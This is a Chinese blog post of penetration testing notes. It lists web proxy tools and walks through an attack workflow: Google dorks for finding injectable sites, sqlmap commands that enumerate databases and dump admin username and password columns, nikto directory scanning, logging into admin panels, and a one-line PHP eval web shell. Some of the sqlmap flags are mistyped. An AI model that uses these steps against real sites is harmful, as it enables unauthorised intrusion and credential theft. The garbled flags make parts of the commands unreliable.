【无标题】

#代理拦截工具

mitmproxy -p 8800 #配置代理

owasp-zap (攻击代理 ZAP) 是一款查找网页应用程序漏洞的综合类渗透测试工具

包包含了拦截代理、自动代理、被动处理、暴力破解、端口扫描以及蜘蛛搜索等功能。

burp suite 是用于攻击web应用程序的集成平台

代理 burp Suite带有一个代理 通过默认端口8080上运行,使用这个代理

proxyStrike v2.1 代理工具

webscarab 代理软件 包括http代理,网络爬行、网络蜘蛛,会话ID分析,自动脚本接口,模糊测试工具,

web格式的编码/解码,WEB服务描述语言和SOAP解析器等功能模块。webScarab基于GNU协议,使用JAVA编写,是WEBGoat中所使用的工具之一

通过google hack 寻找测试目标:

搜索 -》 公司 inurl:asp?id=

1.测试数字型注入点

2.sqlmap拆解数据库和表名

3.dump表数据

4.登陆后台

'

读取数据库版本,当前用户,当前数据库

sqlmap -u 网址 -f -b -current-dbs -curent-user -v 1

sqlmap -u 网址 --tables #列出可能攻击的表

sqlmap -u 网址 -T uname --columns #列出有用的列

sqlmap -u 网址 -T uname - C login_name,pass,username --dump #-C 指定要找的列、 --dump

一个PHP站点的sql注入:

1.测试数字型注入点

2.Sqlmap拆解数据库和表名

3.dump 表数据

4.利用nikto帮助寻找隐藏目录

5.利用网页代码中的隐藏信息寻找管理后台

sqlmap -u 网址 --dbs --current-user

sqlmap -u 网址 --dbs --dbms mysql -D cmxt --tables #cmxt 是数据库

sqlmap -u 网址 --dbs --dbms mysql --tables #不指定数据库

sqlmap -u 网址 --dbs --dbms mysql -T admin -columns #查看列结果

sqlmap -u 网址 --dbs --dbms mysql -T admin -C user,pwd --dump #查询具体列的值

nikto -host 主域名 #查看网站的对应的目录 检存在的漏洞。

fiddler :autoresponser 返回相应网页。来提权。

<?php eval($_POST[x]);?> 一句话密码

相关推荐
Raners_11 分钟前
【Linux】文件权限以及特殊权限(SUID、SGID)
linux·安全
格调UI成品2 小时前
预警系统安全体系构建:数据加密、权限分级与误报过滤方案
大数据·运维·网络·数据库·安全·预警
Wallace Zhang4 小时前
STM32F103_Bootloader程序开发11 - 实现 App 安全跳转至 Bootloader
stm32·嵌入式硬件·安全
CertiK5 小时前
IBW 2025: CertiK首席商务官出席,探讨AI与Web3融合带来的安全挑战
人工智能·安全·web3
m0_738120727 小时前
玄机——某学校系统中挖矿病毒应急排查
网络·安全·web安全
帽儿山的枪手7 小时前
为什么Linux需要3种NAT地址转换?一探究竟
linux·网络协议·安全
leagsoft_10039 天前
联软科技入选《新质·中国数字安全百强(2025)》专业领域榜单,斩获“领先者”称号
科技·安全
浩浩测试一下9 天前
渗透测试指南(CS&&MSF):Windows 与 Linux 系统中的日志与文件痕迹清理
linux·运维·windows·安全·web安全·网络安全·系统安全
安全系统学习9 天前
【网络安全】DNS 域原理、危害及防御
算法·安全·web安全·网络安全·哈希算法
二闹10 天前
擂台赛:图形老将 VS 短信新秀,谁更抗揍?
javascript·后端·安全